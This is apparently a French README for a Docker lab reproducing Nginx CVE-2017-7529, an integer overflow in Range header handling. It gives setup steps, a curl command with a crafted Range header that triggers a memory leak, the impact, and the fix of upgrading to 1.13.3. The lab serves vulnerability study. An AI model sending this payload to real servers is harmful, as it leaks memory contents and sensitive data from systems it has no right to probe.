
Environnement de reproduction basé sur Docker pour la vulnérabilité de débordement d'entier Nginx CVE-2017-7529, démontrant la divulgation d'informations via des en-têtes Range conçus avec un guide d'exploitation étape par étape.
Nginx est un serveur web open source largement utilisé, à la fois comme serveur web haute performance, proxy inverse, serveur de cache, etc.
Dans les versions de Nginx 1.13.2 et antérieures, il existe une vulnérabilité de dépassement d'entier qui permet à un attaquant de manipuler l'en-tête Range pour fuiter des fragments de mémoire ou des informations sensibles en dehors de la plage de réponse initiale.
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
Cette vulnérabilité peut provoquer une divulgation d'informations (Information Disclosure) par une simple requête HTTP.
Si des informations de configuration sensibles ou d'autres données pouvant être divulguées sont incluses, cela peut entraîner un incident de sécurité grave.
Correctif : il est recommandé de mettre à jour vers Nginx 1.13.3 ou ultérieur.
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- ce document